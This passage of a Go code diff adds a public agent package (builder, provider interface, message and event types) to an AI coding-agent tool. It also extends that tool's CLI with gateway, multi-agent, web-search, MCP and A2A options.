+// WithSystemPromptExtra adds extra context to the system prompt.
+func (b *Builder) WithSystemPromptExtra(extra string) *Builder {
+	b.systemPromptExtra = extra
+	return b
+}
+
+// WithMaxIterations sets the safety limit for agent loop iterations.
+func (b *Builder) WithMaxIterations(n int) *Builder {
+	b.maxIterations = n
+	return b
+}
+
+// WithToolExecutionMode sets how tool calls are executed: "sequential" or "parallel".
+func (b *Builder) WithToolExecutionMode(mode string) *Builder {
+	b.toolExecutionMode = mode
+	return b
+}
+
+// WithTools sets a filter for available tools. Empty means all tools.
+func (b *Builder) WithTools(tools []string) *Builder {
+	b.tools = tools
+	return b
+}
+
+// WithSandbox enables or disables sandboxing.
+func (b *Builder) WithSandbox(enabled bool) *Builder {
+	b.sandboxEnabled = enabled
+	return b
+}
+
+// WithSessionDir sets the session persistence directory.
+func (b *Builder) WithSessionDir(dir string) *Builder {
+	b.sessionDir = dir
+	return b
+}
+
+// WithCompaction configures context compaction.
+func (b *Builder) WithCompaction(enabled bool, reserveTokens int) *Builder {
+	b.compactionEnabled = enabled
+	b.compactionReserve = reserveTokens
+	return b
+}
+
+// WithMultiAgent enables multi-agent mode.
+func (b *Builder) WithMultiAgent(enabled bool) *Builder {
+	b.multiAgent = enabled
+	return b
+}
+
+// WithApprovalHandler sets a custom approval handler for tool calls.
+func (b *Builder) WithApprovalHandler(h func(toolCallID, toolName string, args map[string]any) bool) *Builder {
+	b.approvalHandler = h
+	return b
+}
+
+// Build creates and returns an Agent instance.
+// Returns an error if required fields are missing.
+func (b *Builder) Build() (Agent, error) {
+	if b.provider == nil {
+		return nil, fmt.Errorf("agent: provider is required (use WithProvider)")
+	}
+	if b.workDir == "" {
+		wd, err := os.Getwd()
+		if err != nil {
+			return nil, fmt.Errorf("agent: get working directory: %w", err)
+		}
+		b.workDir = wd
+	}
+	if b.modelID == "" {
+		models := b.provider.Models()
+		if len(models) == 0 {
+			return nil, fmt.Errorf("agent: no models available from provider %q", b.provider.Name())
+		}
+		b.modelID = models[0].ID
+	}
+	if b.sessionDir == "" {
+		home, _ := os.UserHomeDir()
+		if home == "" {
+			home = "."
+		}
+		b.sessionDir = filepath.Join(home, ".vibecoding", "sessions")
+	}
+
+	// Delegate to internal builder
+	return buildInternal(b)
+}
+
+// buildInternal is set by internal/agent/init.go to avoid import cycles.
+// The internal package calls agent.SetBuilderFunc() at init time.
+var buildInternal func(b *Builder) (Agent, error)
+
+// SetBuilderFunc registers the internal builder function.
+// Called by internal/agent package at init time.
+func SetBuilderFunc(fn func(b *Builder) (Agent, error)) {
+	buildInternal = fn
+}
+
+// BuilderConfig is the read-only snapshot of Builder state.
+// It is used by the internal package to construct the agent without
+// exposing Builder fields directly.
+type BuilderConfig struct {
+	Provider          Provider
+	ModelID           string
+	Mode              string
+	WorkDir           string
+	ThinkingLevel     ThinkingLevel
+	MaxTokens         int
+	SystemPromptExtra string
+	MaxIterations     int
+	ToolExecutionMode string
+	Tools             []string
+	SandboxEnabled    bool
+	SessionDir        string
+	CompactionEnabled bool
+	CompactionReserve int
+	MultiAgent        bool
+	ApprovalHandler   func(toolCallID, toolName string, args map[string]any) bool
+}
+
+// Config returns a read-only snapshot of the Builder's current configuration.
+// Called by the internal builder function to extract settings without
+// exporting individual fields.
+func (b *Builder) Config() BuilderConfig {
+	return BuilderConfig{
+		Provider:          b.provider,
+		ModelID:           b.modelID,
+		Mode:              b.mode,
+		WorkDir:           b.workDir,
+		ThinkingLevel:     b.thinkingLevel,
+		MaxTokens:         b.maxTokens,
+		SystemPromptExtra: b.systemPromptExtra,
+		MaxIterations:     b.maxIterations,
+		ToolExecutionMode: b.toolExecutionMode,
+		Tools:             b.tools,
+		SandboxEnabled:    b.sandboxEnabled,
+		SessionDir:        b.sessionDir,
+		CompactionEnabled: b.compactionEnabled,
+		CompactionReserve: b.compactionReserve,
+		MultiAgent:        b.multiAgent,
+		ApprovalHandler:   b.approvalHandler,
+	}
+}
+
+// resolveProviderFunc is set by internal/provider to avoid import cycles.
+var resolveProviderFunc func(vendor, baseURL, api, apiKey string) (Provider, error)
+
+// SetResolveProviderFunc registers the provider resolution function.
+func SetResolveProviderFunc(fn func(vendor, baseURL, api, apiKey string) (Provider, error)) {
+	resolveProviderFunc = fn
+}
+
+// WithProviderByName creates a provider from vendor/baseURL/api/apiKey configuration.
+// This is a convenience method that delegates to the internal provider registry.
+func (b *Builder) WithProviderByName(vendor, baseURL, api, apiKey string) *Builder {
+	if resolveProviderFunc != nil {
+		p, err := resolveProviderFunc(vendor, baseURL, api, apiKey)
+		if err == nil && p != nil {
+			b.provider = p
+		}
+	}
+	return b
+}
diff --git a/agent/provider.go b/agent/provider.go
new file mode 100644
index 0000000..e27c8ae
--- /dev/null
+++ b/agent/provider.go
@@ -0,0 +1,180 @@
+package agent
+
+import "context"
+
+// Provider is the interface that all LLM provider implementations must satisfy.
+// External developers implement this to integrate custom LLM backends.
+type Provider interface {
+	// Chat sends a chat request and returns a channel of streaming events.
+	Chat(ctx context.Context, params ChatParams) <-chan StreamEvent
+
+	// Name returns the provider's name (e.g. "openai", "anthropic").
+	Name() string
+
+	// Models returns the list of available models.
+	Models() []ModelInfo
+
+	// GetModel returns a model by ID, or nil if not found.
+	GetModel(id string) *ModelInfo
+}
+
+// ChatParams holds parameters for a chat request.
+type ChatParams struct {
+	Messages      []Message
+	Tools         []ToolDefinition
+	SystemPrompt  string
+	ThinkingLevel ThinkingLevel
+	MaxTokens     int
+	Abort         chan struct{}
+}
+
+// ThinkingLevel represents the thinking/reasoning level.
+type ThinkingLevel string
+
+const (
+	ThinkingOff     ThinkingLevel = "off"
+	ThinkingMinimal ThinkingLevel = "minimal"
+	ThinkingLow     ThinkingLevel = "low"
+	ThinkingMedium  ThinkingLevel = "medium"
+	ThinkingHigh    ThinkingLevel = "high"
+	ThinkingXHigh   ThinkingLevel = "xhigh"
+)
+
+// StreamEventType identifies the type of stream event.
+type StreamEventType int
+
+const (
+	StreamStart StreamEventType = iota
+	StreamTextDelta
+	StreamThinkDelta
+	StreamToolCall
+	StreamUsage
+	StreamDone
+	StreamError
+)
+
+// StreamEvent represents an event from the LLM stream.
+type StreamEvent struct {
+	Type       StreamEventType
+	TextDelta  string
+	ThinkDelta string
+	ToolCall   *ToolCallBlock
+	Usage      *Usage
+	StopReason string
+	Error      error
+}
+
+// ModelInfo describes a model available from a provider.
+type ModelInfo struct {
+	ID            string
+	Name          string
+	Provider      string
+	Reasoning     bool
+	Input         []string
+	ContextWindow int
+	MaxTokens     int
+	Compat        *ModelCompat
+}
+
+// ModelCompat defines per-model compatibility flags.
+// These flags control how the provider adjusts requests/responses
+// for vendor-specific differences.
+// Reference: pi/packages/ai/src/models.generated.ts compat field
+type ModelCompat struct {
+	// Thinking/reasoning
+	ThinkingFormat                      string `json:"thinkingFormat,omitempty"` // "deepseek"|"openai"|"anthropic"|"together"|"zai"|"qwen"
+	RequiresReasoningContentOnAssistant bool   `json:"requiresReasoningContentOnAssistant,omitempty"`
+	ForceAdaptiveThinking               bool   `json:"forceAdaptiveThinking,omitempty"`
+
+	// API parameter compatibility
+	SupportsDeveloperRole   *bool  `json:"supportsDeveloperRole,omitempty"`   // nil = true
+	SupportsStore           *bool  `json:"supportsStore,omitempty"`           // nil = true
+	SupportsReasoningEffort *bool  `json:"supportsReasoningEffort,omitempty"` // nil = true
+	SupportsStrictMode      *bool  `json:"supportsStrictMode,omitempty"`      // nil = true
+	MaxTokensField          string `json:"maxTokensField,omitempty"`          // "max_tokens"|"max_completion_tokens"
+
+	// Cache
+	SupportsCacheControlOnTools *bool `json:"supportsCacheControlOnTools,omitempty"` // nil = true
+	SupportsLongCacheRetention  *bool `json:"supportsLongCacheRetention,omitempty"`  // nil = true
+	SendSessionAffinityHeaders  bool  `json:"sendSessionAffinityHeaders,omitempty"`
+
+	// Streaming
+	SupportsEagerToolInputStreaming *bool `json:"supportsEagerToolInputStreaming,omitempty"` // nil = true
+}
+
+// BoolPtr returns a pointer to the given bool value.
+// Useful for setting optional bool fields in ModelCompat.
+func BoolPtr(v bool) *bool {
+	return &v
+}
+
+// BaseProvider provides common functionality for provider implementations.
+// Embed this in your custom Provider to get Models/GetModel for free.
+type BaseProvider struct {
+	name   string
+	models []ModelInfo
+}
+
+// NewBaseProvider creates a new BaseProvider.
+func NewBaseProvider(name string, models []ModelInfo) BaseProvider {
+	return BaseProvider{name: name, models: models}
+}
+
+// Name returns the provider's name.
+func (p *BaseProvider) Name() string {
+	return p.name
+}
+
+// Models returns the list of available models.
+func (p *BaseProvider) Models() []ModelInfo {
+	return p.models
+}
+
+// GetModel returns a model by ID, or nil if not found.
+func (p *BaseProvider) GetModel(id string) *ModelInfo {
+	for i := range p.models {
+		if p.models[i].ID == id {
+			return &p.models[i]
+		}
+	}
+	return nil
+}
+
+// VendorFromBaseURL attempts to identify the vendor from a base URL.
+// Returns empty string if no match.
+func VendorFromBaseURL(baseURL string) string {
+	vendorMap := map[string]string{
+		"api.deepseek.com":          "deepseek",
+		"api.xiaomimimo.com":        "xiaomi",
+		"api.xiaomi.com":            "xiaomi",
+		"api.moonshot.cn":           "kimi",
+		"api.minimax.chat":          "minimax",
+		"ark.cn-beijing.volces.com": "seed",
+		"aip.baidubce.com":          "qianfan",
+		"dashscope.aliyuncs.com":    "bailian",
+		"ai.gitee.com":              "gitee",
+		"openrouter.ai":             "openrouter",
+		"api.together.xyz":          "together",
+		"api.groq.com":              "groq",
+		"api.fireworks.ai":          "fireworks",
+	}
+	for domain, vendor := range vendorMap {
+		if contains(baseURL, domain) {
+			return vendor
+		}
+	}
+	return ""
+}
+
+func contains(s, substr string) bool {
+	return len(s) >= len(substr) && findSubstring(s, substr)
+}
+
+func findSubstring(s, substr string) bool {
+	for i := 0; i <= len(s)-len(substr); i++ {
+		if s[i:i+len(substr)] == substr {
+			return true
+		}
+	}
+	return false
+}
diff --git a/agent/types.go b/agent/types.go
new file mode 100644
index 0000000..17aa3f6
--- /dev/null
+++ b/agent/types.go
@@ -0,0 +1,343 @@
+// Package agent defines the public Agent interface and related types.
+// External Go developers can import this package to create custom Agent implementations
+// or use the Builder to instantiate the built-in Agent.
+//
+// Import path: github.com/startvibecoding/vibecoding/agent
+package agent
+
+import "context"
+
+// AgentID uniquely identifies an agent instance.
+type AgentID string
+
+// Agent is the interface that all agent implementations must satisfy.
+type Agent interface {
+	// ID returns the unique identifier for this agent.
+	ID() AgentID
+
+	// ParentID returns the ID of the parent agent, or empty if top-level.
+	ParentID() AgentID
+
+	// Run processes a user message and streams events back.
+	Run(ctx context.Context, userMsg string) <-chan Event
+
+	// RunWithMessages processes with explicit message history.
+	RunWithMessages(ctx context.Context, messages []Message) <-chan Event
+
+	// Abort signals the agent to stop processing.
+	Abort()
+
+	// GetMessages returns a copy of the current message history.
+	GetMessages() []Message
+
+	// SetMessages replaces the message history.
+	SetMessages(msgs []Message)
+
+	// GetContext returns a copy of the current agent context.
+	GetContext() *AgentContext
+
+	// SetContext replaces the agent context.
+	SetContext(ctx *AgentContext)
+
+	// GetContextUsage returns the current context window usage, or nil if unavailable.
+	GetContextUsage() *ContextUsage
+
+	// LoadHistoryMessages loads historical messages into agent context.
+	LoadHistoryMessages(messages []Message)
+
+	// HandleApprovalResponse processes the user's approval response for a pending tool call.
+	HandleApprovalResponse(approvalID string, approved bool)
+}
+
+// QuestionHandler is an optional extension of Agent that supports interactive questions.
+// Only implemented by agents in TUI plan mode. Use type assertion to check support.
+type QuestionHandler interface {
+	Agent
+	HandleQuestionResponse(questionID string, answer string)
+}
+
+// AgentConfigView is a read-only view of agent configuration for external inspection.
+type AgentConfigView struct {
+	ID       AgentID
+	ParentID AgentID
+	Mode     string
+	ModelID  string
+}
+
+// ContextUsage reports how much of the context window is consumed.
+type ContextUsage struct {
+	Tokens        int
+	ContextWindow int
+	Percent       *float64
+}
+
+// AgentContext holds the current agent conversation context.
+type AgentContext struct {
+	SystemPrompt string
+	Messages     []Message
+	Tools        []ToolDefinition
+}
+
+// Role identifies who produced a message.
+type Role string
+
+const (
+	RoleUser       Role = "user"
+	RoleAssistant  Role = "assistant"
+	RoleToolResult Role = "toolResult"
+	RoleSystem     Role = "system"
+)
+
+// Message represents a single message in the conversation.
+type Message struct {
+	Role           Role
+	Content        string
+	Contents       []ContentBlock
+	IsError        bool
+	SystemInjected bool
+	ToolCallID     string
+	ToolName       string
+	Usage          *Usage
+}
+
+// ContentBlock represents a typed block within a message.
+type ContentBlock struct {
+	Type         string // "text", "toolCall", "thinking", "image"
+	Text         string
+	ToolCall     *ToolCallBlock
+	Thinking     string
+	Signature    string
+	Image        *ImageContent
+	CacheControl *CacheControl
+}
+
+// ToolCallBlock represents a tool call requested by the LLM.
+type ToolCallBlock struct {
+	ID        string
+	Name      string
+	Arguments []byte
+}
+
+// ImageContent represents an image in a content block.
+type ImageContent struct {
+	MimeType string
+	Data     string // base64-encoded
+}
+
+// CacheControl represents cache control metadata on a content block.
+type CacheControl struct {
+	Type string // "ephemeral"
+}
+
+// ToolDefinition describes a tool available to the LLM.
+type ToolDefinition struct {
+	Name         string
+	Description  string
+	Parameters   []byte // JSON Schema
+	Kind         string // "function" (default) or "hosted"
+	Provider     string
+	ProviderType string
+	Model        string
+}
+
+// Usage tracks token consumption for a single LLM response.
+type Usage struct {
+	InputTokens  int
+	OutputTokens int
+	CacheRead    int
+	CacheWrite   int
+	TotalTokens  int
+	Cost         CostBreakdown
+}
+
+// CostBreakdown itemizes the cost of an LLM call.
+type CostBreakdown struct {
+	Input      float64
+	Output     float64
+	CacheRead  float64
+	CacheWrite float64
+	Total      float64
+}
+
+// CalculateCost computes cost based on model pricing.
+func (u *Usage) CalculateCost(inputPrice, outputPrice, cacheReadPrice, cacheWritePrice float64) {
+	u.Cost.Input = float64(u.InputTokens) * inputPrice / 1_000_000
+	u.Cost.Output = float64(u.OutputTokens) * outputPrice / 1_000_000
+	u.Cost.CacheRead = float64(u.CacheRead) * cacheReadPrice / 1_000_000
+	u.Cost.CacheWrite = float64(u.CacheWrite) * cacheWritePrice / 1_000_000
+	u.Cost.Total = u.Cost.Input + u.Cost.Output + u.Cost.CacheRead + u.Cost.CacheWrite
+}
+
+// EventType identifies the type of agent event.
+type EventType int
+
+const (
+	// Agent lifecycle events
+	EventAgentStart EventType = iota
+	EventAgentEnd
+
+	// Turn lifecycle events (a turn = one assistant response + tool calls/results)
+	EventTurnStart
+	EventTurnEnd
+
+	// Message lifecycle events
+	EventMessageStart
+	EventMessageUpdate
+	EventMessageEnd
+
+	// Streaming events
+	EventTextDelta
+	EventThinkDelta
+
+	// Tool execution events
+	EventToolCall
+	EventToolExecutionStart
+	EventToolExecutionUpdate
+	EventToolExecutionEnd
+	EventToolResult
+	EventToolApprovalRequest  // Request user approval for tool execution
+	EventToolApprovalResponse // User response to approval request
+	EventQuestionRequest      // Ask user a multiple-choice question
+	EventQuestionResponse     // User response to question
+	EventPlanUpdate           // Structured task plan update
+
+	// Status events
+	EventStatus
+	EventDone
+	EventError
+	EventUsage
+
+	// Compaction events
+	EventCompactionStart
+	EventCompactionEnd
+)
+
+// Event represents an event from the agent to the consumer.
+type Event struct {
+	AgentID AgentID
+	Type    EventType
+
+	// Agent lifecycle
+	Messages []Message
+
+	// Turn lifecycle
+	TurnMessage     Message
+	TurnToolResults []Message
+
+	// Message lifecycle
+	Message Message
+
+	// Stream events
+	TextDelta  string
+	ThinkDelta string
+
+	// Tool events
+	ToolCall      *ToolCallBlock
+	ToolCallID    string
+	ToolName      string
+	ToolArgs      map[string]any
+	ToolResult    string
+	ToolDiff      *FileDiff
+	ToolError     error
+	PartialResult any
+
+	// Plan events
+	Plan *TaskPlan
+
+	// Approval events
+	ApprovalID     string
+	ApprovalTool   string
+	ApprovalArgs   map[string]any
+	ApprovalResult bool
+
+	// Question events
+	QuestionID      string
+	QuestionText    string
+	QuestionOptions []string
+	QuestionContext string
+	QuestionAnswer  string
+
+	// Status
+	StatusMessage string
+
+	// Completion
+	Done       bool
+	StopReason string
+	Error      error
+
+	// Usage
+	Usage *Usage
+
+	// Context usage
+	ContextUsage *ContextUsage
+}
+
+// FileDiff describes a file change produced by a write-like tool.
+type FileDiff struct {
+	Path         string
+	Added        int
+	Deleted      int
+	AddedLines   []int
+	DeletedLines []int
+	Unified      string
+	Truncated    bool
+}
+
+// TaskPlan describes a structured task plan emitted by the plan tool.
+type TaskPlan struct {
+	Title string
+	Steps []PlanStep
+	Note  string
+}
+
+// PlanStep describes one step in a task plan.
+type PlanStep struct {
+	Title  string
+	Status string
+}
+
+// --- Helper constructors ---
+
+// NewUserMessage creates a user message with plain text content.
+func NewUserMessage(content string) Message {
+	return Message{Role: RoleUser, Content: content}
+}
+
+// NewAssistantMessage creates an assistant message with content blocks.
+func NewAssistantMessage(contents []ContentBlock) Message {
+	return Message{Role: RoleAssistant, Contents: contents}
+}
+
+// NewAssistantTextMessage creates an assistant message with plain text.
+func NewAssistantTextMessage(content string) Message {
+	return Message{Role: RoleAssistant, Content: content}
+}
+
+// NewToolResultMessage creates a tool result message with plain text.
+func NewToolResultMessage(toolCallID, toolName, content string, isError bool) Message {
+	return Message{
+		Role:       RoleToolResult,
+		Content:    content,
+		ToolCallID: toolCallID,
+		ToolName:   toolName,
+		IsError:    isError,
+	}
+}
+
+// NewToolResultMessageWithContents creates a tool result message with rich content blocks.
+func NewToolResultMessageWithContents(toolCallID, toolName, text string, contents []ContentBlock, isError bool) Message {
+	return Message{
+		Role:       RoleToolResult,
+		Content:    text,
+		Contents:   contents,
+		ToolCallID: toolCallID,
+		ToolName:   toolName,
+		IsError:    isError,
+	}
+}
+
+// NewSystemInjectedUserMessage creates a user message marked as system-injected
+// (skipped by cache markers).
+func NewSystemInjectedUserMessage(content string) Message {
+	return Message{Role: RoleUser, Content: content, SystemInjected: true}
+}
diff --git a/cmd/vibecoding/console_windows.go b/cmd/vibecoding/console_windows.go
index a3914d3..2d4a923 100644
--- a/cmd/vibecoding/console_windows.go
+++ b/cmd/vibecoding/console_windows.go
@@ -4,6 +4,7 @@ package main
 
 import (
 	"fmt"
+	"os"
 
 	tea "github.com/charmbracelet/bubbletea"
 	"golang.org/x/sys/windows"
@@ -23,6 +24,24 @@ func initConsole() error {
 	if err := windows.SetConsoleOutputCP(cpUTF8); err != nil {
 		return fmt.Errorf("set console output code page: %w", err)
 	}
+	if err := enableVirtualTerminal(os.Stdout.Fd(), windows.ENABLE_PROCESSED_OUTPUT|windows.ENABLE_VIRTUAL_TERMINAL_PROCESSING); err != nil {
+		return err
+	}
+	if err := enableVirtualTerminal(os.Stdin.Fd(), windows.ENABLE_EXTENDED_FLAGS); err != nil {
+		return err
+	}
+	return nil
+}
+
+func enableVirtualTerminal(fd uintptr, flags uint32) error {
+	handle := windows.Handle(fd)
+	var mode uint32
+	if err := windows.GetConsoleMode(handle, &mode); err != nil {
+		return nil
+	}
+	if err := windows.SetConsoleMode(handle, mode|flags); err != nil {
+		return fmt.Errorf("set console mode: %w", err)
+	}
 	return nil
 }
 
diff --git a/cmd/vibecoding/main.go b/cmd/vibecoding/main.go
index 7446a0f..c43b850 100644
--- a/cmd/vibecoding/main.go
+++ b/cmd/vibecoding/main.go
@@ -3,26 +3,24 @@ package main
 import (
 	"context"
 	"fmt"
-	"io"
 	"os"
 	"path/filepath"
 	"strings"
 	"time"
 
-	"golang.org/x/term"
-
 	tea "github.com/charmbracelet/bubbletea"
-	"github.com/charmbracelet/glamour"
 	"github.com/spf13/cobra"
 
+	"github.com/startvibecoding/vibecoding/internal/a2a"
 	"github.com/startvibecoding/vibecoding/internal/acp"
 	"github.com/startvibecoding/vibecoding/internal/agent"
 	"github.com/startvibecoding/vibecoding/internal/config"
 	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
 	"github.com/startvibecoding/vibecoding/internal/contextfiles"
+	"github.com/startvibecoding/vibecoding/internal/cron"
+	"github.com/startvibecoding/vibecoding/internal/gateway"
+	"github.com/startvibecoding/vibecoding/internal/mcp"
 	"github.com/startvibecoding/vibecoding/internal/provider"
-	"github.com/startvibecoding/vibecoding/internal/provider/anthropic"
-	"github.com/startvibecoding/vibecoding/internal/provider/openai"
 	"github.com/startvibecoding/vibecoding/internal/sandbox"
 	"github.com/startvibecoding/vibecoding/internal/session"
 	"github.com/startvibecoding/vibecoding/internal/skills"
@@ -31,14 +29,6 @@ import (
 )
 
 var version = "dev"
-var debugEnabled bool
-
-// debugLog prints debug messages to stderr if debug mode is enabled.
-func debugLog(format string, args ...interface{}) {
-	if debugEnabled {
-		fmt.Fprintf(os.Stderr, "[DEBUG] "+format+"\n", args...)
-	}
-}
 
 func main() {
 	rootCmd := newRootCommand(run, acp.Run)
@@ -49,17 +39,23 @@ func main() {
 
 func newRootCommand(runFn func([]string, runOptions) error, acpRunFn func(acp.RunOptions) error) *cobra.Command {
 	var (
-		flagProvider string
-		flagModel    string
-		flagMode     string
-		flagThinking string
-		flagContinue bool
-		flagResume   string
-		flagSession  string
-		flagSandbox  bool
-		flagPrint    bool
-		flagVerbose  bool
-		flagDebug    bool
+		flagProvider        string
+		flagModel           string
+		flagMode            string
+		flagThinking        string
+		flagContinue        bool
+		flagResume          string
+		flagSession         string
+		flagSandbox         bool
+		flagPrint           bool
+		flagVerbose         bool
+		flagDebug           bool
+		flagMultiAgent      bool
+		flagWebSearch       bool
+		flagInitGateway     bool
+		flagForce           bool
+		flagEnableA2AMaster bool
+		flagInitA2AMaster   bool
 	)
 
 	rootCmd := &cobra.Command{
@@ -70,18 +66,37 @@ func newRootCommand(runFn func([]string, runOptions) error, acpRunFn func(acp.Ru
 		Version: version,
 		Args:    cobra.ArbitraryArgs,
 		RunE: func(cmd *cobra.Command, args []string) error {
+			if flagInitA2AMaster {
+				path, err := a2a.InitA2AMasterConfig(flagForce)
+				if err != nil {
+					return err
+				}
+				fmt.Fprintf(os.Stderr, "Created a2a master config: %s\n", path)
+				return nil
+			}
+			if flagInitGateway {
+				path, err := gateway.InitGatewayConfig(flagForce)
+				if err != nil {
+					return err
+				}
+				fmt.Fprintf(os.Stderr, "Created gateway config: %s\n", path)
+				return nil
+			}
 			return runFn(args, runOptions{
-				provider:  flagProvider,
-				model:     flagModel,
-				mode:      flagMode,
-				thinking:  flagThinking,
-				continue_: flagContinue,
-				resume:    flagResume,
-				session:   flagSession,
-				sandbox:   flagSandbox,
-				print:     flagPrint,
-				verbose:   flagVerbose,
-				debug:     flagDebug,
+				provider:        flagProvider,
+				model:           flagModel,
+				mode:            flagMode,
+				thinking:        flagThinking,
+				continue_:       flagContinue,
+				resume:          flagResume,
+				session:         flagSession,
+				sandbox:         flagSandbox,
+				print:           flagPrint,
+				verbose:         flagVerbose,
+				debug:           flagDebug,
+				multiAgent:      flagMultiAgent,
+				webSearch:       flagWebSearch,
+				enableA2AMaster: flagEnableA2AMaster,
 			})
 		},
 	}
@@ -92,13 +107,15 @@ func newRootCommand(runFn func([]string, runOptions) error, acpRunFn func(acp.Ru
 		Long:  "Run vibecoding as an ACP-compliant stdio agent.",
 		RunE: func(cmd *cobra.Command, args []string) error {
 			return acpRunFn(acp.RunOptions{
-				Provider: flagProvider,
-				Model:    flagModel,
-				Mode:     flagMode,
-				Thinking: flagThinking,
-				Sandbox:  flagSandbox,
-				Verbose:  flagVerbose,
-				Debug:    flagDebug,
+				Provider:   flagProvider,
+				Model:      flagModel,
+				Mode:       flagMode,
+				Thinking:   flagThinking,
+				Sandbox:    flagSandbox,
+				Verbose:    flagVerbose,
+				Debug:      flagDebug,
+				MultiAgent: flagMultiAgent,
+				WebSearch:  flagWebSearch,
 			})
 		},
 	}
@@ -115,6 +132,12 @@ func newRootCommand(runFn func([]string, runOptions) error, acpRunFn func(acp.Ru
 	flags.BoolVarP(&flagPrint, "print", "P", false, "Print response and exit (non-interactive)")
 	flags.BoolVar(&flagVerbose, "verbose", false, "Verbose output")
 	flags.BoolVar(&flagDebug, "debug", false, "Enable debug logging")
+	flags.BoolVar(&flagMultiAgent, "multi-agent", false, "Enable multi-agent mode (sub-agent tools)")
+	flags.BoolVar(&flagWebSearch, "web-search", false, "Enable configured web search provider for this run")
+	flags.BoolVar(&flagInitGateway, "init-gateway", false, "Create gateway.json config template")
+	flags.BoolVar(&flagForce, "force", false, "Force overwrite existing files (used with --init-*)")
+	flags.BoolVar(&flagEnableA2AMaster, "enable-a2a-master", false, "Enable A2A master mode (dispatch tasks to remote agents)")
+	flags.BoolVar(&flagInitA2AMaster, "init-a2a-master-config", false, "Create a2a-list.json config template")
 
 	acpFlags := acpCmd.Flags()
 	acpFlags.StringVarP(&flagProvider, "provider", "p", "", "Provider (openai, anthropic, or custom provider name)")
@@ -124,23 +147,67 @@ func newRootCommand(runFn func([]string, runOptions) error, acpRunFn func(acp.Ru
 	acpFlags.BoolVar(&flagSandbox, "sandbox", false, "Enable sandbox (bwrap) for secure execution")
 	acpFlags.BoolVar(&flagVerbose, "verbose", false, "Verbose output")
 	acpFlags.BoolVar(&flagDebug, "debug", false, "Enable debug logging")
+	acpFlags.BoolVar(&flagMultiAgent, "multi-agent", false, "Enable multi-agent mode (sub-agent tools)")
+	acpFlags.BoolVar(&flagWebSearch, "web-search", false, "Enable configured web search provider for this ACP run")
+
+	var (
+		flagGatewayPort    string
+		flagGatewayConfig  string
+		flagGatewayWorkDir string
+	)
+
+	gatewayCmd := &cobra.Command{
+		Use:   "gateway",
+		Short: "Run the OpenAI-compatible HTTP gateway",
+		Long:  "Start VibeCoding as an HTTP server exposing a standard OpenAI Chat Completions API.",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return gateway.Run(gateway.RunOptions{
+				ConfigPath: flagGatewayConfig,
+				Port:       flagGatewayPort,
+				Provider:   flagProvider,
+				Model:      flagModel,
+				WorkDir:    flagGatewayWorkDir,
+				Sandbox:    flagSandbox,
+				MultiAgent: flagMultiAgent,
+				Verbose:    flagVerbose,
+				Debug:      flagDebug,
+			}, version)
+		},
+	}
+
+	gatewayFlags := gatewayCmd.Flags()
+	gatewayFlags.StringVar(&flagGatewayPort, "port", "", "Listen port (default: from gateway.json or 8080)")
+	gatewayFlags.StringVar(&flagGatewayConfig, "config", "", "Path to gateway.json")
+	gatewayFlags.StringVar(&flagGatewayWorkDir, "work-dir", "", "Default working directory")
+	gatewayFlags.StringVarP(&flagProvider, "provider", "p", "", "Provider (openai, anthropic, or custom provider name)")
+	gatewayFlags.StringVarP(&flagModel, "model", "m", "", "Model ID")
+	gatewayFlags.BoolVar(&flagSandbox, "sandbox", false, "Enable sandbox (bwrap) for secure execution")
+	gatewayFlags.BoolVar(&flagMultiAgent, "multi-agent", false, "Enable multi-agent mode (sub-agent tools)")
+	gatewayFlags.BoolVar(&flagVerbose, "verbose", false, "Verbose output")
+	gatewayFlags.BoolVar(&flagDebug, "debug", false, "Enable debug logging")
 
 	rootCmd.AddCommand(acpCmd)
+	rootCmd.AddCommand(gatewayCmd)
+	rootCmd.AddCommand(newHermesCommand())
+	rootCmd.AddCommand(newA2ACommand())
 	return rootCmd
 }
 
 type runOptions struct {
-	provider  string
-	model     string
-	mode      string
-	thinking  string
-	continue_ bool
-	resume    string
-	session   string
-	sandbox   bool
-	print     bool
-	verbose   bool
-	debug     bool
+	provider        string
+	model           string
+	mode            string
+	thinking        string
+	continue_       bool
+	resume          string
+	session         string
+	sandbox         bool
+	print           bool
+	verbose         bool
+	debug           bool
+	multiAgent      bool
+	webSearch       bool
+	enableA2AMaster bool
 }
 
 func run(args []string, opts runOptions) error {
@@ -166,6 +233,9 @@ func run(args []string, opts runOptions) error {
 	if err != nil {
 		return fmt.Errorf("load settings: %w", err)
 	}
+	if opts.webSearch {
+		settings.WebSearch.Enabled = config.BoolPtr(true)
+	}
 
 	// Get working directory
 	cwd, err := os.Getwd()
@@ -289,13 +359,13 @@ func run(args []string, opts runOptions) error {
 			}
 		}
 	} else if opts.session != "" {
-		sess, err = session.Open(opts.session)
+		sess, err = session.OpenByPathOrID(cwd, settings.GetSessionDir(), opts.session)
 		if err != nil {
 			return fmt.Errorf("open session: %w", err)
 		}
 		sessionInfo = fmt.Sprintf("📂 Opened session: %s", sess.GetFile())
 	} else if opts.resume != "" {
-		sess, err = session.Open(opts.resume)
+		sess, err = session.OpenByPathOrID(cwd, settings.GetSessionDir(), opts.resume)
 		if err != nil {
 			return fmt.Errorf("resume session: %w", err)
 		}
@@ -309,26 +379,96 @@ func run(args []string, opts runOptions) error {
 
 	// Setup tools
 	registry := tools.NewRegistry(cwd, sbMgr.GetActive())
-	registry.RegisterDefaults()
+	registry.RegisterDefaultsWithPlanTool(settings.IsPlanToolEnabled())
+
+	// Register question tool for interactive plan mode (TUI only)
+	registry.Register(tools.NewQuestionTool(registry))
 
 	// Register skill reference tool if skills are available
 	if skillsMgr != nil {
 		registry.Register(tools.NewSkillRefTool(skillsMgr))
 	}
 
+	mcpServers, err := mcp.LoadConfiguredServers(cwd)
+	if err != nil {
+		return err
+	}
+	mcpClients, err := mcp.ConnectServers(context.Background(), mcpServers, registry, mcp.Callbacks{})
+	if err != nil {
+		return fmt.Errorf("connect MCP servers: %w", err)
+	}
+	defer mcp.CloseClients(mcpClients)
+
 	// Build extra system context
 	extraContext := contextStr + skillsContext
 
+	// A2A master mode: load agent list and register dispatch tool
+	if opts.enableA2AMaster {
+		// Try project-level first, then global
+		a2aListPath := a2a.ProjectAgentListConfigPath()
+		if _, err := os.Stat(a2aListPath); err != nil {
+			a2aListPath = a2a.AgentListConfigPath()
+		}
+		a2aListCfg, err := a2a.LoadAgentList(a2aListPath)
+		if err != nil {
+			return fmt.Errorf("load a2a-list.json: %w", err)
+		}
+		a2aMgr := a2a.NewA2AManager(a2aListCfg)
